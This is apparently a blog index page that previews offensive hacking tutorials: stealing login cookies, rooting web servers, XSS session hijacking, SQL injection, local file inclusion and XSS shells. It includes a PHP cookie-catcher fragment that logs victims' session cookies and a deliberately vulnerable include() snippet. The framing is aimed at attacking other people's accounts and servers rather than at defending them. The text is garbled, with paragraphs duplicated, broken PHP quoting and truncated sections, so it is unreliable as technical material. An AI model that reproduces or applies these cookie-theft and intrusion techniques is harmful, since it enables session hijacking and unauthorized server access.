How to Steal Someone's Login Cookie Online
In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
fwrite($log, $cookie . \n );
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
fwrite($log, $cookie . \n );
How Hackers Route a Server
Introduction:
For today's tutorial we shall learn how to exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.
1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access
For today's tutorial we shall learn how to exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.
1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access
XSS Complete Tutorial
Hi XSS is in 2 ways, Persistent and Non-Persistent type.
For XSS we will use something called a cookie catcher. Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking
For XSS we will use something called a cookie catcher. Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking
Hacking With SQL Injection
In this tutorial i will describe how sql injection works and how to
use it to get some useful information.
First of all: What is SQL injection?
It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).
use it to get some useful information.
First of all: What is SQL injection?
It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).
Hacking Website with LFI (Local File Inclusion)
This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).
First lets take a look at a php code that is vulnerable to LFI:
Code:
<?php
$page = $_GET[page];
include($page);
First lets take a look at a php code that is vulnerable to LFI:
Code:
<?php
$page = $_GET[page];
include($page);
?>
How to upload Shell through XSS
Hello
and welcome back to Advanced XSS.Today I will be covering the XSS
Shell.An XSS Shell gives the attacker full control over the victims
browser.The shell works inside an iframe environment.This allows the attacker to keep control of the victims browser even if the slave is
browsing to new pages etc...
browser.The shell works inside an iframe environment.This allows the attacker to keep control of the victims browser even if the slave is
browsing to new pages etc...
No comments:
Post a Comment